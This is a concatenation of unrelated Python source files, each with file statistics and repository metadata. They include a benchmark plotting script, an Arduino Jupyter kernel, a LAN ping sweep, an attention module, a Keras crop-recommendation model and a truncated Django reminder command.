2020-08-10T16:46:05.000Z
"""Plot normalized application performance against bandwidth limit (Python 2).

Parses per-benchmark result folders (tensorflow, apache, memcached, dns),
normalizes each benchmark's median performance by its best observed median,
and writes an errorbar plot to bandwidth_vs_performance.eps.
"""
import argparse
import matplotlib
import scipy.stats
matplotlib.use("Agg")
import sys
import matplotlib.pyplot as plt
import numpy as np
import os
sys.path.insert(0, '/root/jcw78/process_pcap_traces/')
import graph_utils

graph_utils.latexify(space_below_graph=0.4)


def tensorflow(folder, name_map):
    """Return [steps/second] parsed from one slave's tensorflow-mnist log."""
    # In tensorflow, the performance data is in all the slaves.
    # It is identical in every one, so just take an arbitrary one.
    machine = name_map['slave'][0]
    data_file = folder + os.path.sep + machine + os.path.sep + \
        'data' + os.path.sep + 'tensorflow-mnist'
    with open(data_file, 'r') as f:
        for line in f.readlines():
            if line.startswith("Training elapsed time"):
                # The benchmark runs for 20000 steps, so get the
                # time per step.
                performance = 20000.0 / float(line.split(' ')[3])
                return [performance]
    # NOTE(review): falls through returning None here, which would break the
    # `performance += get_performance(...)` concatenation in the main script.
    print "Error: no performance numbers found!"


def apache(folder, name_map):
    """Return requests/second from every client's apache `ab` output."""
    # All the slaves have performance numbers here.
    performance_numbers = []
    for machine in name_map['client']:
        data_file = folder + os.path.sep + machine + os.path.sep + \
            'data' + os.path.sep + 'apache_ab_out'
        with open(data_file, 'r') as f:
            for line in f.readlines():
                if line.startswith('Requests per second:'):
                    # Split on whitespace, dropping empty fields from runs of spaces.
                    rate = float([x for x in line.split(' ') if x][3])
                    performance_numbers.append(rate)
    return performance_numbers


def memcached(folder, name_map):
    """Return QPS from every client's mutilate output."""
    # All the slaves have different performance numbers here.
    performance = []
    for machine in name_map['client']:
        data_file = folder + os.path.sep + machine + os.path.sep + \
            'data' + os.path.sep + 'memcached_mutilate_stdout'
        with open(data_file, 'r') as f:
            for line in f.readlines():
                if line.startswith('Total QPS'):
                    rate = float(line.split(' ')[3])
                    performance.append(rate)
    return performance


def dns(folder, name_map):
    """Return queries/second from every client's dns-out file."""
    # All the slaves have different performance numbers here.
    performance = []
    for slave in name_map['client']:
        data_file = folder + os.path.sep + slave + os.path.sep + \
            'data' + os.path.sep + 'dns-out'
        with open(data_file, 'r') as f:
            for line in f.readlines():
                if 'Queries per second:' in line:
                    rate = float([x for x in line.split(' ') if x][3])
                    performance.append(rate)
    return performance


def get_performance(benchmark_name, benchmark_folder):
    """Map machine roles from the MachineRoles file, then dispatch to the
    benchmark-specific parser; returns a list of performance numbers."""
    # First, from the machine roles file get the server and
    # the client folders.
    role_to_name_map = {}
    with open(benchmark_folder + os.path.sep + 'MachineRoles', 'r') as f:
        lines = f.readlines()
        for line in lines:
            if benchmark_name + '-' in line:
                _, role = line.strip().split('-')
                management_ip = line.split(' ')[0].strip()
                # Now get the name of the machine for that
                # IP.
                for line in lines:
                    if management_ip in line:
                        name = line.split(' ')[3].strip()
                        break
                if role in role_to_name_map:
                    role_to_name_map[role].append(name)
                else:
                    role_to_name_map[role] = [name]
    # How the performance is handled depends on the
    # benchmark.
    if benchmark_name == 'tensorflow':
        return tensorflow(benchmark_folder, role_to_name_map)
    elif benchmark_name == 'dns':
        return dns(benchmark_folder, role_to_name_map)
    elif benchmark_name == 'memcached':
        return memcached(benchmark_folder, role_to_name_map)
    elif benchmark_name == 'apache':
        return apache(benchmark_folder, role_to_name_map)
    else:
        print "I don't know how to extract performance numbers from",
        print benchmark_name


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('results_folders', nargs='+')
    parser.add_argument('--num-machines', default='7', dest='num_machines')
    args = parser.parse_args()

    # First, get all the individual runs out of a folder.
    benchmark_folders = []
    for folder in args.results_folders:
        folders = [folder + os.path.sep + x for x in os.listdir(folder)]
        benchmark_folders += folders

    # Now, get the benchmarks that we ran.
    # Also get the rates.
    # Folder names look like <benchmark>_<rate>_<suffix>.
    benchmarks = []
    rates = {}
    folders_by_benchmark_rate = {}
    for folder in benchmark_folders:
        name, rate, _ = os.path.basename(folder).split('_')
        rate = int(rate)
        if name not in benchmarks:
            benchmarks.append(name)
        if name in rates:
            rates[name].append(rate)
        else:
            rates[name] = [rate]
        folders_by_benchmark_rate[name + str(rate)] = folder

    plt.clf()
    # Construct a line for every benchmark.
    for benchmark in benchmarks:
        errors_below = []
        errors_above = []
        app_performances = []
        values = []
        plotted_rates = []
        for rate in sorted(rates[benchmark]):
            folder_name = folders_by_benchmark_rate[benchmark + str(rate)]
            # Get all the benchmark runs:
            run_parent_folder = folder_name + os.path.sep + args.num_machines + '_machines' + os.path.sep + 'run'
            run_folders = os.listdir(run_parent_folder)
            # How each run is parsed depends on the type
            # of benchmark. Parse that.
            performance = []
            for run_folder in run_folders:
                # Skip runs that were flagged as timed out.
                if not os.path.exists(run_parent_folder + os.path.sep + run_folder + os.path.sep + 'FAILED_WITH_TIMEOUT'):
                    performance+=get_performance(benchmark, run_parent_folder + os.path.sep + run_folder)
            print benchmark
            print len(performance)
            if len(performance) > 0:
                app_performances.append(performance)
                plotted_rates.append(rate)
            else:
                print "No performance numbers found for ", run_parent_folder
        # We normalize with respect to the highest available
        # bandwidth.
        highest_median = None
        for performance in app_performances:
            if highest_median:
                highest_median = \
                    max(np.median(performance), highest_median)
            else:
                highest_median = np.median(performance)
        for i in range(len(app_performances)):
            app_performances[i] = np.array(app_performances[i]) / highest_median
        # Median with 25th/75th percentile error bars per rate.
        for performance in app_performances:
            value = np.median(performance)
            values.append(value)
            low_percentile, high_percentile = np.percentile(performance, [25, 75])
            errors_below.append(value - low_percentile)
            errors_above.append(high_percentile - value)
        print benchmark
        print plotted_rates
        plt.errorbar(plotted_rates, values, yerr=(errors_below, errors_above), label=benchmark, capsize=5)

    plt.ylabel('Normalized Performance')
    plt.xlabel('Bandwidth Limit (Mbps)')
    graph_utils.set_legend_below(ncol=4)
    graph_utils.set_ticks()
    graph_utils.set_non_negative_axes()
    plt.xlim([0, 10000])
    filename = 'bandwidth_vs_performance.eps'
    plt.savefig(filename)
    print "Done! File saved in: ", filename
35.707547
122
0.604359
926
7,570
4.769978
0.235421
0.028526
0.038714
0.030564
0.264433
0.228209
0.22187
0.166855
0.151913
0.121349
0
0.006975
0.299207
7,570
211
123
35.876777
0.825636
0.107662
0
0.217105
0
0
0.082294
0.012626
0
0
0
0
0
0
null
null
0
0.052632
null
null
0.059211
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99edf83c304fa89bec4ed4d3b21dd4548b013c50
1,368
py
Python
bot/utils/errors.py
Clutter-Development/Clutter
6b725c016a439958caaa7d88bacae8e2b11ca272
[ "CC0-1.0" ]
6
2022-02-04T17:11:19.000Z
2022-03-05T09:14:39.000Z
bot/utils/errors.py
Clutter-Development/Clutter
6b725c016a439958caaa7d88bacae8e2b11ca272
[ "CC0-1.0" ]
2
2022-02-08T16:53:42.000Z
2022-02-19T07:44:19.000Z
bot/utils/errors.py
Clutter-Development/Clutter
6b725c016a439958caaa7d88bacae8e2b11ca272
[ "CC0-1.0" ]
2
2022-02-18T21:28:57.000Z
2022-02-23T17:08:18.000Z
import discord
from discord import app_commands as app

__all__ = (
    "ClutterError",
    "InDevelopmentMode",
    "UserIsBlacklisted",
    "GuildIsBlacklisted",
    "UserHasBeenBlacklisted",
    "GlobalCooldownReached",
    "UnknownTranslationString",
)


class ClutterError(discord.DiscordException):
    """Base class for all Clutter errors."""


class InDevelopmentMode(ClutterError, app.AppCommandError):
    """Raised when a user is not a bot admin and bot is in development mode when using an app command."""


class UserIsBlacklisted(ClutterError, app.AppCommandError):
    """Raised when a user is blacklisted when using an app command."""


class GuildIsBlacklisted(ClutterError, app.AppCommandError):
    """Raised when a guild is blacklisted when using an app command."""


class UserHasBeenBlacklisted(ClutterError, app.AppCommandError):
    # Docstring fix: was a copy-paste of UserIsBlacklisted's docstring.
    """Raised when a user has just been blacklisted while using an app command."""


class GlobalCooldownReached(ClutterError, app.AppCommandError):
    # Docstring fix: was a copy-paste of UserIsBlacklisted's docstring.
    """Raised when the global cooldown is reached when using an app command."""

    def __init__(self, retry_after: float, message: str, /):
        # Seconds until the cooldown expires, and the message shown to the user.
        self.retry_after = retry_after
        self.message = message

    def __str__(self):
        return self.message


class UnknownTranslationString(ClutterError, app.AppCommandError):
    """Raised when a translation string is missing"""
28.5
105
0.736111
150
1,368
6.606667
0.333333
0.090817
0.181635
0.217962
0.445005
0.445005
0.336024
0.336024
0.249243
0.249243
0
0
0.173977
1,368
47
106
29.106383
0.876991
0.306287
0
0
0
0
0.143483
0.073384
0
0
0
0
0
1
0.086957
false
0
0.086957
0.043478
0.521739
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
99ef4c4300edcee0f21908e1a69183d6ec7a6f37
44
py
Python
seq2seq/seq2seq/loss/__init__.py
qbetterk/user-simulator
77caca30ff67b9112b1fe5e65e191c6b5e25532c
[ "Apache-2.0" ]
20
2019-11-08T02:28:28.000Z
2022-02-07T09:20:21.000Z
seq2seq/seq2seq/loss/__init__.py
qbetterk/user-simulator
77caca30ff67b9112b1fe5e65e191c6b5e25532c
[ "Apache-2.0" ]
21
2019-11-08T02:27:40.000Z
2022-03-12T00:02:54.000Z
seq2seq/seq2seq/loss/__init__.py
qbetterk/user-simulator
77caca30ff67b9112b1fe5e65e191c6b5e25532c
[ "Apache-2.0" ]
8
2020-02-10T07:28:37.000Z
2021-09-23T09:42:14.000Z
from .loss import Loss, NLLLoss, Perplexity
22
43
0.795455
6
44
5.833333
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.136364
44
1
44
44
0.921053
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
99efb291ee7023242cf3315eacce5ac12e340e87
5,703
py
Python
arduino_kernel/kernel.py
jpsaenzmo/jupyter-lab-kernelino
57b20c9cecf74d6533243729f47ab9cc74e0ef7d
[ "BSD-3-Clause" ]
null
null
null
arduino_kernel/kernel.py
jpsaenzmo/jupyter-lab-kernelino
57b20c9cecf74d6533243729f47ab9cc74e0ef7d
[ "BSD-3-Clause" ]
null
null
null
arduino_kernel/kernel.py
jpsaenzmo/jupyter-lab-kernelino
57b20c9cecf74d6533243729f47ab9cc74e0ef7d
[ "BSD-3-Clause" ]
null
null
null
from ipykernel.kernelbase import Kernel
import json
import os
import subprocess
import sys
import urllib
from urllib.request import urlopen

from requests.compat import urljoin
from notebook.notebookapp import list_running_servers

from .board import Board, BoardError

# Folder (relative to the working directory) holding the generated sketch.
SKETCH_FOLDER = ".arduino/sketch"


class ArduinoKernel(Kernel):
    """Jupyter kernel that compiles/uploads Arduino sketches via arduino-cli."""

    implementation = "Arduino"
    implementation_version = "1.0"
    language = "no-op"
    language_version = "0.1"
    language_info = {
        "name": "Any text",
        "mimetype": "text/plain",
        "file_extension": ".ino",
    }
    banner = "Arduino kernel"

    def __init__(self, **kwargs):
        Kernel.__init__(self, **kwargs)
        self._start_bash()

    def _start_bash(self):
        """Restore the default SIGINT handler and ensure the sketch folder exists."""
        from pexpect import replwrap
        import signal

        sig = signal.signal(signal.SIGINT, signal.SIG_DFL)
        try:
            os.makedirs(SKETCH_FOLDER)
        except FileExistsError:
            pass

    def do_execute(
        self, code, silent, store_history=True, user_expressions=None, allow_stdin=False
    ):
        """Execute a cell: board listing, library install, or compile/upload.

        Cells either contain an arduino-cli command verbatim, or a sketch
        prefixed with "port%<port>" / "board%<fqbn>" directive lines.
        """
        from pexpect import EOF

        # Empty cell: report success without doing anything.
        if not code.strip():
            return {
                # Bug fix: was "OK" — the Jupyter protocol status value is
                # lowercase "ok", matching the success return below.
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }

        # Non-empty cell
        interrupted = False
        try:
            try:
                os.makedirs(SKETCH_FOLDER)
            except FileExistsError:
                pass

            if code == "arduino-cli board list":
                try:
                    sp = subprocess.check_output(
                        "arduino-cli board list", stderr=subprocess.STDOUT, shell=False
                    )
                except subprocess.CalledProcessError as e:
                    raise RuntimeError(
                        "command '{}' return with error (code {}): {}".format(
                            e.cmd, e.returncode, e.output
                        )
                    )
                output = sp.decode(sys.stdout.encoding)

            elif code.startswith("arduino-cli lib install"):
                try:
                    sp = subprocess.check_output(
                        code,
                        stderr=subprocess.STDOUT,
                        shell=True,
                    )
                except subprocess.CalledProcessError as e:
                    errorTxt = "Command '{}' return with error (code {}): {}".format(
                        e.cmd, e.returncode, e.output
                    )
                    stream_content = {"name": "stdout", "text": errorTxt}
                    self.send_response(self.iopub_socket, "stream", stream_content)
                    return {"status": "abort", "execution_count": self.execution_count}
                output = sp.decode(sys.stdout.encoding)

            else:
                # Leading "port%..." / "board%..." lines select upload vs compile.
                oper = code.split("\n")[0]
                command = ""
                codes = ""
                if oper.split("%")[0] == "port":
                    port = oper.split("%")[1]
                    fqbn = code.split("\n")[1]
                    fqbn = fqbn.split("%")[1]
                    codes = code.split("\n", 2)[2]
                    command = (
                        "arduino-cli upload -p "
                        + port
                        + " --fqbn "
                        + fqbn
                        + " "
                        + SKETCH_FOLDER
                    )
                elif oper.split("%")[0] == "board":
                    fqbn = code.split("\n")[0]
                    fqbn = fqbn.split("%")[1]
                    codes = code.split("\n", 1)[1]
                    command = "arduino-cli compile -b " + fqbn + " " + SKETCH_FOLDER

                # Write the sketch; `with` guarantees the file is closed even
                # if the write raises (original leaked the handle on error).
                with open(SKETCH_FOLDER + "/sketch.ino", "w+") as f:
                    f.write(codes.rstrip())

                try:
                    sp = subprocess.check_output(
                        command,
                        stderr=subprocess.STDOUT,
                        shell=True,
                    )
                except subprocess.CalledProcessError as e:
                    errorTxt = "Command '{}' return with error (code {}): {}".format(
                        e.cmd, e.returncode, e.output
                    )
                    stream_content = {"name": "stdout", "text": errorTxt}
                    self.send_response(self.iopub_socket, "stream", stream_content)
                    return {"status": "abort", "execution_count": self.execution_count}
                output = sp.decode(sys.stdout.encoding)

        except KeyboardInterrupt:
            interrupted = True
            clean_sketches()
        # Restarting Bash
        except EOF:
            # NOTE(review): self.bash_wrapper is never assigned in this file —
            # this path would raise AttributeError; presumably leftover from a
            # bash-based kernel. TODO confirm before relying on it.
            output = self.bash_wrapper.child.before + "Restarting Bash"

        # If expecting output
        if not silent:
            stream_content = {"name": "stdout", "text": output}
            self.send_response(self.iopub_socket, "stream", stream_content)

        # If interrupted
        if interrupted:
            clean_sketches()
            return {"status": "abort", "execution_count": self.execution_count}
        # If everything is OK
        else:
            return {
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }


def clean_sketches():
    """Delete every file in the sketch folder (used after an interrupt)."""
    sketch_dir = "./" + SKETCH_FOLDER
    if os.path.isfile(sketch_dir + "/sketch.ino"):
        # Bug fix: the original joined against an undefined name `mydir`,
        # raising NameError; remove the files from the sketch folder itself.
        for fname in os.listdir(sketch_dir):
            os.remove(os.path.join(sketch_dir, fname))
35.867925
88
0.476065
505
5,703
5.253465
0.310891
0.05277
0.033924
0.050886
0.456087
0.402563
0.390878
0.390878
0.312853
0.294007
0
0.004815
0.417324
5,703
158
89
36.094937
0.79356
0.016833
0
0.374101
0
0
0.115357
0
0
0
0
0
0
1
0.028777
false
0.014388
0.093525
0
0.208633
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f29d7b80d7894462f8ed96f68faef9669e0b6b
3,022
py
Python
baidu_code/bcoreapi/info/schedule.py
deevarvar/myLab
7a5019f5f7fc11e173d350e6e2a7d2c80504782d
[ "MIT" ]
null
null
null
baidu_code/bcoreapi/info/schedule.py
deevarvar/myLab
7a5019f5f7fc11e173d350e6e2a7d2c80504782d
[ "MIT" ]
null
null
null
baidu_code/bcoreapi/info/schedule.py
deevarvar/myLab
7a5019f5f7fc11e173d350e6e2a7d2c80504782d
[ "MIT" ]
3
2016-10-08T15:01:49.000Z
2018-05-24T03:14:24.000Z
#-*- coding=utf-8 -*- ''' @description: 影讯新接口——排期接口测试用例。 @author: miliang<miliang@baidu.com> ''' from base import Info_Base class Info_Schedule(Info_Base): def __init__(self,cinema_id=None,encode_bid=None,bid=None): super(Info_Schedule,self).__init__() self.req_url = self.req_url + 'schedule' self.req_dict = {} if cinema_id: self.req_dict['cinema_id'] = cinema_id self.cinema_id = cinema_id if encode_bid: self.req_dict['encode_id'] = encode_id self.encode_id = encode_id if bid: self.req_dict['bid'] = bid self.bid = bid def doAssert(self): print self.page_dict assert self.page_dict['errorMsg'] == 'Success' assert self.page_dict['movie_id'] assert self.page_dict['time_table'] partner = '' for date in self.page_dict['time_table']: for schedule in self.page_dict['time_table'][date]: #上一个合作方的竞争价,要求按竞争价升序排列(下线了) #former_com_price = 0 assert schedule['time'] assert schedule['date'] assert schedule['movie_id'] assert schedule['end_time'] assert schedule.has_key('src_info') for i in range(len(schedule['src_info'])): assert schedule['src_info'][i]['src'] # 5.11:仅返回C端同一合作方的影讯 if partner == '': partner = schedule['src_info'][i]['src'] else : assert schedule['src_info'][i]['src'] == partner assert schedule['src_info'][i].has_key('lan') # 这个暂时可能为空 assert schedule['src_info'][i].has_key('type') # 这个暂时可能为空 assert schedule['src_info'][i]['origin_price'] assert schedule['src_info'][i]['price'] assert schedule['src_info'][i].has_key('seq_no') # 这个暂时可能为空 assert schedule['src_info'][i]['third_cinema_id'] assert schedule['src_info'][i]['third_movie_id'] assert schedule['src_info'][i]['theater'] assert schedule['src_info'][i]['src_name'] assert schedule['src_info'][i]['out_buy_time'] assert schedule['src_info'][i].has_key('hall_id') # 这个暂时可能为空 assert schedule['src_info'][i].has_key('weight') assert schedule['src_info'][i].has_key('status') and schedule['src_info'][i]['status'] == 0 or schedule['src_info'][i]['status'] == 1 #assert schedule['src_info'][i].has_key('com_price') and 
schedule['src_info'][i]['com_price'] >= former_com_price #former_com_price = schedule['src_info'][i]['com_price'] if __name__ == '__main__': case = Info_Schedule(cinema_id=8350) case.execute()
43.171429
154
0.531105
348
3,022
4.324713
0.232759
0.106977
0.219269
0.223256
0.445847
0.352824
0.140864
0.047841
0
0
0
0.005456
0.332892
3,022
69
155
43.797101
0.740079
0.095301
0
0
0
0
0.155039
0
0
0
0
0
0.48
0
null
null
0
0.02
null
null
0.02
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
4
99f2a8cd466b198120000a799808ca4ceb565c8a
465
py
Python
ping.py
TuxStory/Python3
4c1b2291d1613b32aa36b62b0b881ea40b423cce
[ "MIT" ]
null
null
null
ping.py
TuxStory/Python3
4c1b2291d1613b32aa36b62b0b881ea40b423cce
[ "MIT" ]
null
null
null
ping.py
TuxStory/Python3
4c1b2291d1613b32aa36b62b0b881ea40b423cce
[ "MIT" ]
null
null
null
import os


def ping(plage):
    """Ping every address plage+0 .. plage+254 and report the ones that answer."""
    for host in range(255):
        address = plage + str(host)
        # os.system returns 0 when the single ping succeeded.
        status = os.system("ping -c 1 " + address + " >/dev/null")
        if status == 0:
            print(address, "est actif sur le reseau.")


def main():
    """Clear the screen, show usage examples, then scan the requested network."""
    os.system("clear")
    print("PingPy".center(25, "-"))
    print("\nExemple : 192.168.1.")
    print("Exemple : 192.168.0.")
    print("-" * 25)
    Plage = input("Adresses reseau a scanner: ")
    ping(Plage)


if __name__ == "__main__":
    main()
23.25
67
0.556989
66
465
3.80303
0.590909
0.071713
0.079681
0
0
0
0
0
0
0
0
0.065527
0.245161
465
19
68
24.473684
0.649573
0
0
0
0
0
0.290323
0
0
0
0
0
0
1
0.125
false
0
0.0625
0
0.1875
0.3125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f3591924ec7be6b6dc2dbe39d731a3c039c201
971
py
Python
MathUtilities.py
paulmontecot/PythonDFTMotionP3
741e544e0885e97a5469649ae2a90eadbec914c5
[ "MIT" ]
null
null
null
MathUtilities.py
paulmontecot/PythonDFTMotionP3
741e544e0885e97a5469649ae2a90eadbec914c5
[ "MIT" ]
null
null
null
MathUtilities.py
paulmontecot/PythonDFTMotionP3
741e544e0885e97a5469649ae2a90eadbec914c5
[ "MIT" ]
null
null
null
import numpy as np
import pandas as pd


def integral(df, data):
    """Cumulative trapezoidal integral of `data` over the `df.time` column.

    Returns a list the same length as `data`; element 0 is always 0 and each
    subsequent element adds the trapezoid area of one time step.
    """
    result = [0]
    for i in range(len(df.index) - 1):
        dt_ = df.time[i + 1] - df.time[i]
        # Trapezoid area over [t_i, t_{i+1}]: rectangle + triangle.
        step = data[i] * dt_ + (data[i + 1] - data[i]) * dt_ / 2.0
        result.append(result[i] + step)
    return result


def derivData(df, data):
    """Numerical derivative of `data` with respect to `df.time`.

    Element 0 is always 0; element 1 uses a forward difference and later
    elements use a central difference (same values as the original code).
    """
    deriv = [0]
    for i in range(len(df.index) - 1):
        if i == 0:
            # Forward difference for the first computed point.
            deriv.append((data[i + 1] - data[i]) /
                         (df.time[i + 1] - df.time[i]))
        else:
            # Central difference. The original also had an
            # `elif i == len(df.index) - 1` backward-difference branch, but the
            # loop stops at len-2 so it could never execute; it is removed.
            deriv.append((data[i + 1] - data[i - 1]) /
                         (df.time[i + 1] - df.time[i - 1]))
    return deriv


def angle(df, X, Z):
    """Element-wise arctan(X / Z).

    `df` is unused (kept for API compatibility with the other helpers); the
    original's dead `angle = [0]` pre-assignment is removed.
    """
    return np.arctan(X / Z)


def norme(df):
    """Row-wise Euclidean norm of the accX/accY/accZ columns of `df`."""
    return np.sqrt((df['accX'] ** 2) + (df['accY'] ** 2) + (df['accZ'] ** 2))
27.742857
93
0.510814
151
971
3.245033
0.238411
0.040816
0.114286
0.081633
0.361224
0.322449
0.291837
0.093878
0.093878
0
0
0.031838
0.288363
971
34
94
28.558824
0.677279
0
0
0.074074
0
0
0.012384
0
0
0
0
0
0
1
0.148148
false
0
0.074074
0
0.222222
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f3fc94d7ce6e669de010cfe49cc2e8d70b8888
3,461
py
Python
attention.py
lil-lab/atis
08a17a7be8cd7b40d2f35e089947df4d543b3321
[ "MIT" ]
21
2019-06-03T14:21:00.000Z
2022-01-14T13:43:42.000Z
attention.py
clic-lab/atis
08a17a7be8cd7b40d2f35e089947df4d543b3321
[ "MIT" ]
3
2018-07-05T13:42:31.000Z
2019-04-02T12:01:18.000Z
attention.py
clic-lab/atis
08a17a7be8cd7b40d2f35e089947df4d543b3321
[ "MIT" ]
12
2018-06-13T00:11:33.000Z
2019-04-15T22:12:08.000Z
"""Contains classes for computing and keeping track of attention distributions. """ from collections import namedtuple import dynet as dy import dynet_utils as du class AttentionResult(namedtuple('AttentionResult', ('scores', 'distribution', 'vector'))): """Stores the result of an attention calculation.""" __slots__ = () class Attention(): """Attention mechanism class. Stores parameters for and computes attention. Attributes: transform_query (bool): Whether or not to transform the query being passed in with a weight transformation before computing attentino. transform_key (bool): Whether or not to transform the key being passed in with a weight transformation before computing attentino. transform_value (bool): Whether or not to transform the value being passed in with a weight transformation before computing attentino. key_size (int): The size of the key vectors. value_size (int): The size of the value vectors. the query or key. query_weights (dy.Parameters): Weights for transforming the query. key_weights (dy.Parameters): Weights for transforming the key. value_weights (dy.Parameters): Weights for transforming the value. """ def __init__(self, model, query_size, key_size, value_size): self.key_size = key_size self.value_size = value_size self.query_weights = du.add_params( model, (query_size, self.key_size), "weights-attention-q") def transform_arguments(self, query, keys, values): """ Transforms the query/key/value inputs before attention calculations. Arguments: query (dy.Expression): Vector representing the query (e.g., hidden state.) keys (list of dy.Expression): List of vectors representing the key values. values (list of dy.Expression): List of vectors representing the values. Returns: triple of dy.Expression, where the first represents the (transformed) query, the second represents the (transformed and concatenated) keys, and the third represents the (transformed and concatenated) values. 
""" assert len(keys) == len(values) all_keys = dy.concatenate(keys, d=1) all_values = dy.concatenate(values, d=1) assert all_keys.dim()[0][0] == self.key_size, "Expected key size of " + \ str(self.key_size) + " but got " + str(all_keys.dim()[0][0]) assert all_values.dim()[0][0] == self.value_size query = du.linear_transform(query, self.query_weights) if du.is_vector(query): query = du.add_dim(query) return query, all_keys, all_values def __call__(self, query, keys, values=None): if not values: values = keys query_t, keys_t, values_t = self.transform_arguments(query, keys, values) scores = dy.transpose(query_t * keys_t) distribution = dy.softmax(scores) context_vector = values_t * distribution return AttentionResult(scores, distribution, context_vector)
39.781609
86
0.608206
397
3,461
5.161209
0.27204
0.02733
0.021474
0.023426
0.321132
0.271352
0.252806
0.144461
0.144461
0.099561
0
0.003377
0.315516
3,461
86
87
40.244186
0.861545
0.445247
0
0
0
0
0.050257
0
0
0
0
0
0.076923
1
0.076923
false
0
0.076923
0
0.282051
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f5c968619741d599aec34b3b7698daeeb82d4a
2,655
py
Python
v0/hack1.py
dhvakr/Farm-Hub---Hackverse-2021
3444c16dc792a3d533a071f41d53b7b9efbf0a78
[ "MIT" ]
2
2021-04-21T07:26:01.000Z
2021-04-21T07:26:17.000Z
v0/hack1.py
dhvakr/Farm-Hub---Hackverse-2021
3444c16dc792a3d533a071f41d53b7b9efbf0a78
[ "MIT" ]
null
null
null
v0/hack1.py
dhvakr/Farm-Hub---Hackverse-2021
3444c16dc792a3d533a071f41d53b7b9efbf0a78
[ "MIT" ]
2
2021-05-21T08:44:41.000Z
2021-07-16T14:59:24.000Z
# -*- coding: utf-8 -*-
"""
Created on Saturday - 2021

@author: DIVAKARAN
"""
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from keras.models import Sequential
from keras.layers import Activation
from keras.optimizers import SGD
from keras.layers import Dense

# Crop columns shared by the relabelled frame, the label frame, and the
# prediction frame.
CROPS = ["Rice", "Wheat", "Cotton", "Sugarcane", "Tea",
         "Coffee", "Cashew", "Rubber", "Coconut", "Oilseed",
         "Ragi", "Maize", "Groundnut", "Millet", "Barley"]

df = pd.read_csv("final.csv")

# Label-encode the three categorical feature columns in place
# (the encoder is refit per column, exactly as before).
le = preprocessing.LabelEncoder()
for column in ("Soil", "Month", "State"):
    le.fit(df[column])
    df[column] = le.transform(df[column])

# Drop the leading index column and rename everything.
df = pd.DataFrame(data=df.iloc[:, 1:].values,
                  columns=["Soil", "Month", "State"] + CROPS)

feat = pd.DataFrame({"Soil": df["Soil"],
                     "Month": df["Month"],
                     "State": df["State"]})
labels = pd.DataFrame(data=df.iloc[:, 3:], columns=CROPS)

from keras.utils import np_utils
from sklearn.model_selection import train_test_split

(trainData, testData,
 trainLabels, testLabels) = train_test_split(feat, labels,
                                             test_size=0.25, random_state=42)
print(trainData.values)

# Single sigmoid layer: 3 encoded inputs -> 15 crop probabilities.
model = Sequential()
model.add(Dense(15, input_dim=3, init="uniform", activation="sigmoid"))

print(trainData.shape, testData.shape, trainLabels.shape, testLabels.shape)

sgd = SGD(lr=0.01)
model.compile(loss="binary_crossentropy", optimizer=sgd,
              metrics=["accuracy"])
model.fit(trainData.values, trainLabels.values,
          epochs=500, batch_size=10, verbose=1)

(loss, accuracy) = model.evaluate(testData.values, testLabels.values,
                                  batch_size=40, verbose=1)
print("[INFO] loss={:.4f}, accuracy: {:.4f}%".format(loss, accuracy * 100))

pred = model.predict_proba(testData.values)
df = pd.DataFrame(pred, columns=CROPS)
print(df)
34.480519
215
0.698682
364
2,655
5.024725
0.35989
0.024604
0.024604
0.039366
0.296884
0.240022
0.218699
0.218699
0.218699
0.165118
0
0.021821
0.102448
2,655
77
216
34.480519
0.745699
0.064407
0
0
0
0
0.207234
0
0
0
0
0
0
1
0
false
0
0.282051
0
0.282051
0.102564
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f5e77d5e735a8f18f4fdcee74e3f414905ae28
1,978
py
Python
app/base/management/commands/send_reminder.py
Sovol2018/sovolo
54250e42b4af3391d2f99690f45b93ab240563c2
[ "MIT" ]
2
2017-06-06T11:34:49.000Z
2017-10-24T13:09:50.000Z
app/base/management/commands/send_reminder.py
Sovol2018/sovolo
54250e42b4af3391d2f99690f45b93ab240563c2
[ "MIT" ]
346
2016-08-09T20:50:57.000Z
2018-08-28T06:52:17.000Z
app/base/management/commands/send_reminder.py
hejob/sovolo
8b73253d7bf0427c7ae0ebb6d8e3d70e118e8427
[ "MIT" ]
3
2017-11-27T14:07:57.000Z
2018-08-13T15:51:01.000Z
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.template.loader import get_template
from event.models import Event, Frame
from base.utils import send_template_mail
from django.utils import timezone
import datetime
import sys
import io

sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')


class Command(BaseCommand):
    help = """
    以下の動作をします。毎日午前9時に一度実行されることを想定しています。
    - 翌日開催or翌日登録締切のボランティア参加者にリマインダーを送る
    """
